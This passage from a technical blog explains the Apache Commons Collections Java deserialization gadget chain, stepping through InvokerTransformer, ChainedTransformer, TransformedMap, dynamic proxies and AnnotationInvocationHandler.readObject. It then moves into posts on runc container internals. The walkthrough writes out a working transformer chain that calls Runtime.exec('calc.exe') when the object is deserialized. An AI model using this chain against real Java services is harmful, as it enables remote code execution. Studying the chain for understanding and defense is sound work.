ObjectOutputStream oos = new ObjectOutputStream(fos);
oos.writeObject(instance);
oos.close();
// deserialize
FileInputStream fis = new FileInputStream("cc1");
ObjectInputStream ois = new ObjectInputStream(fis);
ois.readObject();
ois.close();
}
</code></pre></div></div>
<h3> Transformer </h3>
<p>Commons Collections provides a powerful interface called Transformer. As the name suggests, it performs a transformation. InvokerTransformer is particularly important: it invokes a specified method to do the transformation. Below is an example of using this Transformer.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> public class Main {
public static void main(String[] args) {
HashMap<String, String> a = new HashMap<>();
Transformer keyTrans = new InvokerTransformer("concat", new Class[]{String.class}, new Object[]{"A"});
Transformer valueTrans = new InvokerTransformer("toUpperCase", new Class[]{}, new Object[]{});
Map b = TransformedMap.decorate(a, keyTrans, valueTrans);
b.put("a", "aaa");
b.put("b", "bbb");
b.put("c", "ccc");
Iterator it = b.entrySet().iterator();
while(it.hasNext()) {
Map.Entry entry = (Map.Entry)it.next();
System.out.println("key="+entry.getKey()+",value="+entry.getValue());
}
}
}
</code></pre></div></div>
<p>The output is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> key=cA,value=CCC
key=bA,value=BBB
key=aA,value=AAA
</code></pre></div></div>
<p>InvokerTransformer's constructor takes three arguments: the method name, the method's parameter types, and the arguments passed to that method. TransformedMap.decorate takes the map to decorate, the Transformer applied to keys, and the Transformer applied to values. With this configuration, every element added through the decorated map (b) is "transformed" before being stored in the underlying map (a).</p>
<p>Look at the TransformedMap source directly:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> public Object put(Object key, Object value) {
key = this.transformKey(key);
value = this.transformValue(value);
return this.getMap().put(key, value);
}
protected Object transformKey(Object object) {
return this.keyTransformer == null ? object : this.keyTransformer.transform(object);
}
protected Object transformValue(Object object) {
return this.valueTransformer == null ? object : this.valueTransformer.transform(object);
}
</code></pre></div></div>
<p>Next, look at the transform implementation in InvokerTransformer:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> public Object transform(Object input) {
if (input == null) {
return null;
} else {
try {
Class cls = input.getClass();
Method method = cls.getMethod(this.iMethodName, this.iParamTypes);
return method.invoke(input, this.iArgs);
} catch (NoSuchMethodException var5) {
throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' does not exist");
} catch (IllegalAccessException var6) {
throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' cannot be accessed");
} catch (InvocationTargetException var7) {
throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' threw an exception", var7);
}
}
}
</code></pre></div></div>
<p>This code is the core of the Commons Collections exploit: it essentially invokes an arbitrary method on the class of the input argument, where iMethodName, iParamTypes, and iArgs were supplied when the InvokerTransformer was constructed.</p>
<p>Back to the PoC, which uses a ChainedTransformer:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Transformer chain = new ChainedTransformer(transformers);
Map innerMap = new HashMap();
innerMap.put("value","test");
Map outerMap = TransformedMap.decorate(innerMap, null, chain);
</code></pre></div></div>
<p>ChainedTransformer's transform is implemented as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> public Object transform(Object object) {
for(int i = 0; i < this.iTransformers.length; ++i) {
object = this.iTransformers[i].transform(object);
}
return object;
}
</code></pre></div></div>
<p>It simply calls transform on each of the iTransformers (supplied when constructing the ChainedTransformer) in turn, feeding each result into the next call as its argument. Combined with the definition of transformers:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Transformer[] transformers = {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod",new Class[]{String.class, Class[].class}, new Object[]{"getRuntime",null}),
new InvokerTransformer("invoke",new Class[]{Object.class, Object[].class}, new Class[]{Runtime.class, null}),
new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc.exe"})
};
</code></pre></div></div>
<p>ConstantTransformer's transform just returns the object passed at construction. For a map decorated with these transformers, the transform process goes as follows:</p>
<ol>
<li>Runtime.class denotes class Runtime; the first link in the chain returns it unchanged</li>
<li>Runtime.class is itself an instance of class Class, and Class has a getMethod method, so the first InvokerTransformer calls getMethod on Runtime.class with the argument getRuntime, yielding a Method object (getRuntime)</li>
<li>The second InvokerTransformer calls invoke on the getRuntime Method, which returns a Runtime object</li>
<li>The third InvokerTransformer calls Runtime's exec method with the argument calc.exe, achieving code execution.</li>
</ol>
<p>This process is essentially equivalent to the following code.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Object obj0 = Runtime.class;
Class cls1 = obj0.getClass();
Method method1 = cls1.getMethod("getMethod", new Class[]{String.class, Class[].class});
Object obj1 = method1.invoke(obj0, "getRuntime", new Class[0]);
Class cls2 = obj1.getClass();
Method method2 = cls2.getMethod("invoke", new Class[]{Object.class, Object[].class});
Object obj2 = method2.invoke( obj1, null, new Object[0]);
Class cls3 = obj2.getClass();
Method method3 = cls3.getMethod("exec", new Class[]{String.class});
Object obj3 = method3.invoke(obj2, "calc.exe");
</code></pre></div></div>
<p>Here is the debugging result:</p>
<p><img src="/assets/img/java1/1.png" alt="" /></p>
<h3> Dynamic proxies </h3>
<p>There are plenty of dynamic proxy examples online; let's pick one <a href="https://www.jianshu.com/p/9bcac608c714">example</a> to analyze.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> interface HelloInterface {
void sayHello();
}
class Hello implements HelloInterface{
@Override
public void sayHello() {
System.out.println("Hello world!");
}
}
class ProxyHandler implements InvocationHandler {
private Object object;
public ProxyHandler(Object object){
this.object = object;
}
@Override
public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
System.out.println("Before invoke " + method.getName());
method.invoke(object, args);
System.out.println("After invoke " + method.getName());
return null;
}
}
public class Main {
public static void main(String[] args) throws Exception {
System.getProperties().setProperty("sun.misc.ProxyGenerator.saveGeneratedFiles", "true");
HelloInterface hello = new Hello();
InvocationHandler handler = new ProxyHandler(hello);
HelloInterface proxyHello = (HelloInterface) Proxy.newProxyInstance(hello.getClass().getClassLoader(), hello.getClass().getInterfaces(), handler);
proxyHello.sayHello();
System.out.println(proxyHello);
}
}
</code></pre></div></div>
<p>The output is as follows. Every method called through the proxyHello object goes through our ProxyHandler.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Before invoke sayHello
Hello world!
After invoke sayHello
Before invoke toString
After invoke toString
null
</code></pre></div></div>
<p>Debugging shows that proxyHello is actually an object of type $Proxy0, an internally generated class that implements HelloInterface.</p>
<p><img src="/assets/img/java1/2.png" alt="" /></p>
<p>Locating the generated file on disk shows the following content. The auto-generated proxy class implements HelloInterface; its methods cover the HelloInterface method sayHello plus several basic Object methods, and each is implemented by calling super.h.invoke — the method that the proxy handler (here, ProxyHandler) must implement.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> public final class $Proxy0 extends Proxy implements HelloInterface {
private static Method m3;
private static Method m1;
private static Method m0;
private static Method m2;
public $Proxy0(InvocationHandler var1) throws {
super(var1);
}
public final void sayHello() throws {
try {
super.h.invoke(this, m3, (Object[])null);
} catch (RuntimeException | Error var2) {
throw var2;
} catch (Throwable var3) {
throw new UndeclaredThrowableException(var3);
}
}
public final boolean equals(Object var1) throws {
try {
return (Boolean)super.h.invoke(this, m1, new Object[]{var1});
} catch (RuntimeException | Error var3) {
throw var3;
} catch (Throwable var4) {
throw new UndeclaredThrowableException(var4);
}
}
public final int hashCode() throws {
try {
return (Integer)super.h.invoke(this, m0, (Object[])null);
} catch (RuntimeException | Error var2) {
throw var2;
} catch (Throwable var3) {
throw new UndeclaredThrowableException(var3);
}
}
public final String toString() throws {
try {
return (String)super.h.invoke(this, m2, (Object[])null);
} catch (RuntimeException | Error var2) {
throw var2;
} catch (Throwable var3) {
throw new UndeclaredThrowableException(var3);
}
}
static {
try {
m3 = Class.forName("test.com.company.HelloInterface").getMethod("sayHello");
m1 = Class.forName("java.lang.Object").getMethod("equals", Class.forName("java.lang.Object"));
m0 = Class.forName("java.lang.Object").getMethod("hashCode");
m2 = Class.forName("java.lang.Object").getMethod("toString");
} catch (NoSuchMethodException var2) {
throw new NoSuchMethodError(var2.getMessage());
} catch (ClassNotFoundException var3) {
throw new NoClassDefFoundError(var3.getMessage());
}
}
}
</code></pre></div></div>
<p>Back to this line in the example:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> (HelloInterface) Proxy.newProxyInstance(hello.getClass().getClassLoader(), hello.getClass().getInterfaces(), handler);
</code></pre></div></div>
<p>newProxyInstance takes three arguments: the class loader, the interfaces, and the handler. Notice that the proxy is bound to the interface and has nothing to do with the concrete implementation Hello. So our example can be simplified as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> interface HelloInterface {
void sayHello();
}
class ProxyHandler implements InvocationHandler {
@Override
public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
System.out.println("Before invoke " + method.getName());
System.out.println(method.getName()+" is called");
System.out.println("After invoke " + method.getName());
return "test";
}
}
public class Main {
public static void main(String[] args) throws Exception {
System.getProperties().setProperty("sun.misc.ProxyGenerator.saveGeneratedFiles", "true");
InvocationHandler handler = new ProxyHandler();
HelloInterface proxyHello = (HelloInterface) Proxy.newProxyInstance(HelloInterface.class.getClassLoader(), new Class[]{HelloInterface.class}, handler);
proxyHello.sayHello();
System.out.println(proxyHello);
}
}
</code></pre></div></div>
<p>The output is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Before invoke sayHello
sayHello is called
After invoke sayHello
Before invoke toString
toString is called
After invoke toString
test
</code></pre></div></div>
<p>If we now look at the generated $Proxy0.class, the content is essentially the same. So in essence, Proxy generates a class for the interfaces to be proxied and returns an instance of it; the user calls the interface methods on that instance, and the calls end up in the user-supplied handler.</p>
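<p>The two binding facts just described — the generated class extends Proxy and routes every call to the supplied handler — can be checked directly through the public reflection API. A minimal sketch (the interface and handler names are my own, not from the article's example):</p>

```java
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;

interface HelloInterface { void sayHello(); }

public class ProxyIntrospect {
    public static void main(String[] args) {
        InvocationHandler h = (proxy, method, a) -> null;
        Object proxy = Proxy.newProxyInstance(
                HelloInterface.class.getClassLoader(),
                new Class[]{HelloInterface.class}, h);
        // The generated class extends java.lang.reflect.Proxy ...
        System.out.println(proxy.getClass().getSuperclass() == Proxy.class);
        // ... and the handler we passed in can be recovered from it
        System.out.println(Proxy.getInvocationHandler(proxy) == h);
    }
}
```

Both lines print true, confirming that the proxy object is nothing more than a generated subclass of Proxy wrapping our handler.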
<h3> How Java annotations are implemented </h3>
<p>Understanding Java annotations here is really about understanding how Commons Collections uses AnnotationInvocationHandler.
Java annotations are code-level comments: comments in the sense that an annotation does not change the runtime behavior of the annotated code, and code-level in the sense that annotations do generate code — they can be retrieved at runtime to perform checks and validation, for example during Java compilation. Annotations come in two kinds: ordinary annotations such as @Override and @Deprecated, which apply to code, and meta-annotations such as @Retention and @Target, which apply to user-defined annotations. In the code below we define two annotations, one for classes and one for methods, and a Person class that uses both.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> @Retention(RetentionPolicy.RUNTIME)
@Target(ElementType.TYPE)
@interface AnnType {
String msg() default "type";
}
@Retention(RetentionPolicy.RUNTIME)
@Target(ElementType.METHOD)
@interface AnnMethod {
String msg() default "method";
}
@AnnType(msg="xaa")
class Person {
String name;
int age;
public Person() {
name = "aa";
age = 12;
}
public void print() {
System.out.println(name);
}
@AnnMethod
public String to_string() {
return "Person{" +
"name='" + name + '\'' +
'}';
}
}
public class Main {
public static void main(String[] args) throws Exception {
System.setProperty("sun.misc.ProxyGenerator.saveGeneratedFiles", "true");
System.out.println(new Person().to_string());
}
}
</code></pre></div></div>
<p>The output is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Person{name='aa'}
</code></pre></div></div>
<p>As expected, the annotations do not affect the code's behavior.</p>
<h4> Each annotation is implemented as an interface </h4>
<p>Consider the following code:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Class<?> annTypecls = AnnType.class;
Class<?>[] panntype = annTypecls.getInterfaces();
</code></pre></div></div>
<p><img src="/assets/img/java1/3.png" alt="" /></p>
<h4> Using annotations </h4>
<p>Here is how annotations are read:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> AnnType annType = Person.class.getAnnotation(AnnType.class);
String annTypeValue = annType.msg();
AnnMethod annMethod = Person.class.getMethod("to_string", new Class[0]).getAnnotation(AnnMethod.class);
String annMethodValue = annMethod.msg();
System.out.println("annTypevalue = " + annTypeValue+", annMethodValue = " + annMethodValue);
</code></pre></div></div>
<p>Output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> annTypevalue = xaa, annMethodValue = method
</code></pre></div></div>
<p>Comparing with the example code, the class annotation is the value we specified (xaa) and the method annotation is the default value (method). We already know that an annotation is an interface, so whatever Class/Method.getAnnotation returns must be a class implementing that interface. Debugging shows that getAnnotation returns a proxy object — exactly the dynamic proxy mechanism described in the previous section, with AnnotationInvocationHandler as its handler.</p>
<p><img src="/assets/img/java1/4.png" alt="" /></p>
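<p>This can also be verified without a debugger. The sketch below (with a hypothetical Demo annotation standing in for AnnType) asks the JDK whether the object returned by getAnnotation is a dynamic proxy — on HotSpot/OpenJDK it is:</p>

```java
import java.lang.annotation.Retention;
import java.lang.annotation.RetentionPolicy;
import java.lang.reflect.Proxy;

// Hypothetical annotation just for this check; any RUNTIME-retained one works
@Retention(RetentionPolicy.RUNTIME)
@interface Demo { String msg() default "hi"; }

@Demo(msg = "xaa")
public class AnnotationProxyCheck {
    public static void main(String[] args) {
        Demo d = AnnotationProxyCheck.class.getAnnotation(Demo.class);
        // On HotSpot the annotation instance is a JDK dynamic proxy
        System.out.println(Proxy.isProxyClass(d.getClass()));
        // The proxy resolves msg() to the value stored for this use site
        System.out.println(d.msg());
    }
}
```

This prints true followed by xaa, matching the debugger screenshot above.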
<h4> Annotation implementation </h4>
<p>This section follows</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Person.class.getAnnotation(AnnType.class);
</code></pre></div></div>
<p>to study how Annotation is implemented.</p>
<p>A Class object has an annotations member holding the type's annotation information. annotations is a Map whose keys are annotation Classes and whose values are dynamic proxies implementing Annotation. getAnnotation is implemented as follows; initAnnotationsIfNecessary initializes annotations and only does real work on the first call. Once annotations is populated, getAnnotation simply looks up annotationClass in the Map and returns the result.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Map<Class<? extends Annotation>, Annotation> annotations;
public <A extends Annotation> A getAnnotation(Class<A> annotationClass) {
if (annotationClass == null)
throw new NullPointerException();
initAnnotationsIfNecessary();
return (A) annotations.get(annotationClass);
}
</code></pre></div></div>
<p>initAnnotationsIfNecessary is implemented as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> private synchronized void initAnnotationsIfNecessary() {
clearAnnotationCachesOnClassRedefinition();
if (annotations != null)
return;
declaredAnnotations = AnnotationParser.parseAnnotations(
getRawAnnotations(), getConstantPool(), this);
Class<?> superClass = getSuperclass();
if (superClass == null) {
annotations = declaredAnnotations;
} else {
annotations = new HashMap<>();
superClass.initAnnotationsIfNecessary();
for (Map.Entry<Class<? extends Annotation>, Annotation> e : superClass.annotations.entrySet()) {
Class<? extends Annotation> annotationClass = e.getKey();
if (AnnotationType.getInstance(annotationClass).isInherited())
annotations.put(annotationClass, e.getValue());
}
annotations.putAll(declaredAnnotations);
}
}
</code></pre></div></div>
<p>As the code shows, the Class object also has a declaredAnnotations member, which holds the annotations declared on the class itself. If there is no superclass, annotations and declaredAnnotations hold the same data; if there is one, initAnnotationsIfNecessary also copies the superclass's inheritable annotations into annotations. The key call is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> declaredAnnotations = AnnotationParser.parseAnnotations(
getRawAnnotations(), getConstantPool(), this);
</code></pre></div></div>
<p>Following the chain parseAnnotations-&gt;parseAnnotations2-&gt;parseAnnotation2, the last function does the actual annotation parsing.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> private static Annotation parseAnnotation2(ByteBuffer var0, ConstantPool var1, Class<?> var2, boolean var3, Class<? extends Annotation>[] var4) {
int var5 = var0.getShort() & '\uffff';
Class var6 = null;
String var7 = "[unknown]";
try {
try {
var7 = var1.getUTF8At(var5);//var7 is the class name: Ltest/com/company/AnnType;
var6 = parseSig(var7, var2);//var6 is interface test.com.company.AnnType
} catch (IllegalArgumentException var18) {
var6 = var1.getClassAt(var5);
}
}...
if (var4 != null && !contains(var4, var6)) {
skipAnnotation(var0, false);
return null;
} else {
AnnotationType var8 = null;
try {
var8 = AnnotationType.getInstance(var6);//var8 is the AnnotationType
} catch (IllegalArgumentException var17) {
skipAnnotation(var0, false);
return null;
}
Map var9 = var8.memberTypes();
LinkedHashMap var10 = new LinkedHashMap(var8.memberDefaults());
int var11 = var0.getShort() & '\uffff';
for(int var12 = 0; var12 < var11; ++var12) {
int var13 = var0.getShort() & '\uffff';
String var14 = var1.getUTF8At(var13);
Class var15 = (Class)var9.get(var14);
if (var15 == null) {
skipMemberValue(var0);
} else {
Object var16 = parseMemberValue(var15, var0, var1, var2);
if (var16 instanceof AnnotationTypeMismatchExceptionProxy) {
((AnnotationTypeMismatchExceptionProxy)var16).setMember((Method)var8.members().get(var14));
}
var10.put(var14, var16);
}
}
return annotationForMap(var6, var10);
}
}
</code></pre></div></div>
<p>We said earlier that an annotation is an interface extending Annotation. The new player here is AnnotationType, a class that stores the annotation's metadata. Its three most important members are the following three Maps.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> private final Map<String, Class<?>> memberTypes;
private final Map<String, Object> memberDefaults;
private final Map<String, Method> members;
</code></pre></div></div>
<p>The first, memberTypes, maps member names to their Classes; the second, memberDefaults, maps member names to their default values; and the third, members, maps member names to their Methods. For the AnnType annotation in our example, the members look like this:</p>
<p><img src="/assets/img/java1/5.png" alt="" /></p>
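<p>The same member/default information cached in those three maps can be observed through the public reflection API: each annotation member is a method of the annotation interface, and its default is exposed via Method.getDefaultValue. A small self-contained sketch (AnnType redeclared locally for this example):</p>

```java
import java.lang.annotation.Retention;
import java.lang.annotation.RetentionPolicy;
import java.lang.reflect.Method;

@Retention(RetentionPolicy.RUNTIME)
@interface AnnType { String msg() default "type"; }

public class MemberDefaults {
    public static void main(String[] args) {
        // Each member of the annotation is a method on the @interface;
        // this mirrors what AnnotationType's members/memberDefaults store
        for (Method m : AnnType.class.getDeclaredMethods()) {
            System.out.println(m.getName() + " -> " + m.getDefaultValue());
        }
    }
}
```

This prints msg -&gt; type, which is exactly the "msg"/"type" pair seen in the memberDefaults map above.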
<p>An AnnotationType is created via AnnotationType.getInstance, which parseAnnotation2 calls. The final for loop in parseAnnotation2 replaces the annotation's default values with the actual ones — for example, AnnType's default is type, but Person sets it to xaa.</p>
<p>parseAnnotation2 ends by calling annotationForMap.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> public static Annotation annotationForMap(Class<? extends Annotation> var0, Map<String, Object> var1) {
return (Annotation)Proxy.newProxyInstance(var0.getClassLoader(), new Class[]{var0}, new AnnotationInvocationHandler(var0, var1));
}
</code></pre></div></div>
<p>annotationForMap creates the dynamic proxy. Here var0 is the Class object of AnnType, and var1 is a LinkedHashMap of annotation member names to values — for the Person class, "msg"-&gt;"xaa". The handler is AnnotationInvocationHandler.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> AnnotationInvocationHandler(Class<? extends Annotation> var1, Map<String, Object> var2) {
Class[] var3 = var1.getInterfaces();
if (var1.isAnnotation() && var3.length == 1 && var3[0] == Annotation.class) {
this.type = var1;
this.memberValues = var2;
} else {
throw new AnnotationFormatError("Attempt to create proxy for a non-annotation type.");
}
}
</code></pre></div></div>
<p>The constructor stores the annotation's type information and the member key-value pairs in memberValues.</p>
<p>When the test example calls annMethod.msg(), the call goes through the proxy class's invoke, which delegates to the handler's invoke. AnnotationInvocationHandler's invoke looks like this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> public Object invoke(Object var1, Method var2, Object[] var3) {
String var4 = var2.getName();
Class[] var5 = var2.getParameterTypes();
if (var4.equals("equals") && var5.length == 1 && var5[0] == Object.class) {
return this.equalsImpl(var3[0]);
} else if (var5.length != 0) {
throw new AssertionError("Too many parameters for an annotation method");
} else {
byte var7 = -1;
switch(var4.hashCode()) {
case -1776922004:
if (var4.equals("toString")) {
var7 = 0;
}
break;
case 147696667:
if (var4.equals("hashCode")) {
var7 = 1;
}
break;
case 1444986633:
if (var4.equals("annotationType")) {
var7 = 2;
}
}
switch(var7) {
case 0:
return this.toStringImpl();
case 1:
return this.hashCodeImpl();
case 2:
return this.type;
default:
Object var6 = this.memberValues.get(var4);
if (var6 == null) {
throw new IncompleteAnnotationException(this.type, var4);
} else if (var6 instanceof ExceptionProxy) {
throw ((ExceptionProxy)var6).generateException();
} else {
if (var6.getClass().isArray() && Array.getLength(var6) != 0) {
var6 = this.cloneArray(var6);
}
return var6;
}
}
}
}
</code></pre></div></div>
<p>For any method call that is not one of the built-ins, var4 holds the method name, which is looked up in the this.memberValues Map to obtain the value to return.</p>
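<p>That map-backed dispatch is easy to reproduce in miniature. The following sketch (names are my own, not from the JDK) builds a proxy whose invoke resolves the called method's name in a Map, just like the memberValues lookup above:</p>

```java
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.Map;

interface Conf { String msg(); }

public class MapBackedProxy {
    public static void main(String[] args) {
        Map<String, Object> values = new HashMap<>();
        values.put("msg", "xaa");
        // Like AnnotationInvocationHandler: answer calls by method name
        InvocationHandler h = (proxy, method, a) -> values.get(method.getName());
        Conf c = (Conf) Proxy.newProxyInstance(
                Conf.class.getClassLoader(), new Class[]{Conf.class}, h);
        System.out.println(c.msg()); // prints xaa
    }
}
```

A three-line handler is enough because the annotation interface's methods take no arguments; the real AnnotationInvocationHandler adds special cases only for equals/hashCode/toString/annotationType.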
<h3> PoC analysis </h3>
<p>In the PoC, what gets written to the file is essentially an instance of AnnotationInvocationHandler constructed with Retention.class and a TransformedMap. Read forward, this builds an AnnotationInvocationHandler for the Retention annotation whose backing Map is the TransformedMap. The TransformedMap's state, including its transformers, is of course serialized into the file as well.</p>
<p>During deserialization, AnnotationInvocationHandler's own readObject is invoked.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> private void readObject(ObjectInputStream var1) throws IOException, ClassNotFoundException {
var1.defaultReadObject();
AnnotationType var2 = null;
try {
var2 = AnnotationType.getInstance(this.type);
} catch (IllegalArgumentException var9) {
throw new InvalidObjectException("Non-annotation type in annotation serial stream");
}
Map var3 = var2.memberTypes();
Iterator var4 = this.memberValues.entrySet().iterator();
while(var4.hasNext()) {
Entry var5 = (Entry)var4.next();
String var6 = (String)var5.getKey();
Class var7 = (Class)var3.get(var6);
if (var7 != null) {
Object var8 = var5.getValue();
if (!var7.isInstance(var8) && !(var8 instanceof ExceptionProxy)) {
var5.setValue((new AnnotationTypeMismatchExceptionProxy(var8.getClass() + "[" + var8 + "]")).setMember((Method)var2.members().get(var6)));
}
}
}
}
</code></pre></div></div>
<p>var1.defaultReadObject first performs the default deserialization, which reconstructs the AnnotationInvocationHandler.</p>
<p><img src="/assets/img/java1/6.png" alt="" /></p>
<p>Next, the AnnotationType for the Retention annotation is obtained.</p>
<p><img src="/assets/img/java1/7.png" alt="" /></p>
<p>Retention is a meta-annotation, so the AnnotationType here is derived from the following definition.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> @Documented
@Retention(RetentionPolicy.RUNTIME)
@Target(ElementType.ANNOTATION_TYPE)
public @interface Retention {
RetentionPolicy value();
}
</code></pre></div></div>
<p>Now the var3 Map holds the genuine member type information of the Retention annotation: the key is "value" and the value is RetentionPolicy, a custom class.
The code then loops over our deserialized this.memberValues Map, essentially checking whether the types of the deserialized values match the memberTypes of the generated AnnotationType.
Because the Map we placed in the AnnotationInvocationHandler at serialization time contains "value"="test" — a String — while the AnnotationType says a RetentionPolicy is required, var5.setValue is eventually called, which reaches TransformedMap's checkSetValue and therefore the transform function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> protected Object checkSetValue(Object value) {
return this.valueTransformer.transform(value);
}
</code></pre></div></div>
<p>In summary, AnnotationInvocationHandler's readObject is essentially performing a validation; when a value fails the check, it calls the Map entry's set method, which triggers the Transformer's transform and thus arbitrary code execution.</p>
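<p>The trigger can be sketched without Commons Collections on the classpath. Below, a hypothetical CheckedEntry stands in for TransformedMap's entry wrapper: setValue routes the new value through a caller-supplied transformer, which is exactly the hook readObject ends up firing (all names here are illustrative, not the real library API):</p>

```java
import java.util.HashMap;
import java.util.Map;
import java.util.function.Function;

public class SetValueTrigger {
    // Minimal stand-in for the decorated entry: setValue runs the transformer,
    // mirroring TransformedMap.checkSetValue
    static class CheckedEntry<K, V> {
        private final Map.Entry<K, V> inner;
        private final Function<V, V> valueTransformer;
        CheckedEntry(Map.Entry<K, V> inner, Function<V, V> valueTransformer) {
            this.inner = inner;
            this.valueTransformer = valueTransformer;
        }
        V setValue(V value) {
            return inner.setValue(valueTransformer.apply(value));
        }
    }

    public static void main(String[] args) {
        Map<String, String> m = new HashMap<>();
        m.put("value", "test");
        // In the PoC this Function is the ChainedTransformer gadget
        Function<String, String> t = v -> {
            System.out.println("transform called with " + v);
            return v.toUpperCase();
        };
        // Mirrors readObject iterating memberValues and calling setValue
        for (Map.Entry<String, String> e : m.entrySet()) {
            new CheckedEntry<>(e, t).setValue("replaced");
        }
        System.out.println(m.get("value"));
    }
}
```

The transformer runs as a side effect of setValue — in the real exploit that side effect is the Runtime.exec chain rather than a harmless toUpperCase.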
<h3> Summary </h3>
<p>Starting from a Commons Collections PoC, this post walked through the concepts that beginners find hardest, chiefly dynamic proxies and the annotation implementation. With this analysis you should be able to understand the AnnotationInvocationHandler-based Commons Collections gadget chain. The analysis also shows that the Commons Collections exploit is fairly involved and not really beginner material; Fastjson deserialization, by comparison, is much simpler.</p>
runc internals, part 3: runc double clone2021-12-28T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2021/12/28/runc-internals-3
<p>We have now analyzed the general flow of 'runc create' and know that it executes the 'runc init' parent process; the parent clones a child process, the child clones a grandchild, and the grandchild executes the user-defined process.</p>
<p>I had planned to draw a picture of the relationship between these four processes, but I found a detailed one <a href="https://mp.weixin.qq.com/s/mSlc2RMRDe6liXb-ejtRvA">here</a>, which I reference below.</p>
<p><img src="/assets/img/runcinternals3/1.png" alt="" /></p>
<p>Let's look at what each process does.</p>
<h3> parent </h3>
<p>This is runc:[0:PARENT].</p>
<ul>
<li>
<p>Get the config from the runc create process. This is done by</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> nl_parse(pipenum, &config); //corresponding runc create code :io.Copy(p.messageSockPair.parent, p.bootstrapData)
</code></pre></div> </div>
</li>
<li>Create two socketpairs, 'sync_child_pipe' and 'sync_grandchild_pipe', to sync with the child and grandchild.</li>
<li>Clone the child process</li>
<li>Update the uid/gid mappings for the child process</li>
<li>Receive the pids of the child and grandchild, and send both to the runc create process so that runc create can send config data to the grandchild.</li>
<li>Wait for the grandchild to run</li>
</ul>
<h3> child </h3>
<p>This is runc:[1:CHILD].</p>
<ul>
<li>Join the namespaces specified in config.json</li>
<li>Ask the parent process to set the uid/gid mappings</li>
<li>Unshare the namespaces specified in config.json</li>
<li>Clone the grandchild process</li>
<li>Send the grandchild's pid to the parent</li>
</ul>
<h3> grandchild </h3>
<p>This is runc:[2:INIT].</p>
<ul>
<li>Now this process is in the new pid namespace.</li>
<li>Notify the parent process that we are ready</li>
<li>factory.StartInitialization()</li>
<li>Configure the environment specified in config.json and execute the user process</li>
</ul>
<h3> summary </h3>
<p>The first clone lets the parent set the uid/gid mappings. The second clone makes the pid namespace take effect. After this double clone, the final child process is fully inside the desired new environment.</p>
<h3> reference </h3>
<p><a href="https://mp.weixin.qq.com/s/mSlc2RMRDe6liXb-ejtRvA">runc源码分析</a>
<a href="https://zdyxry.github.io/2020/04/12/runc-nsenter-%E6%BA%90%E7%A0%81%E9%98%85%E8%AF%BB/">runc nsenter 源码阅读</a></p>
runc internals, part 2: create and run a container2021-12-23T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2021/12/23/runc-internals-2
<h3> runc create analysis </h3>
<p>We can create a container by running 'runc create'. To avoid dealing with the tty/console, let's change the default config.json:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> "terminal": false,
...
"args": [
"sleep",
"1000"
],
</code></pre></div></div>
<p>The important function calls are listed below.</p>
<p>startContainer
–>setupSpec
–>createContainer
–>specconv.CreateLibcontainerConfig
–>loadFactory
–>factory.Create
–>manager.New</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>--runner.run
-->newProcess
-->setupIO
-->r.container.Start
-->c.createExecFifo
-->c.start
-->c.newParentProcess
-->c.commandTemplate
-->c.newInitProcess
-->parent.start
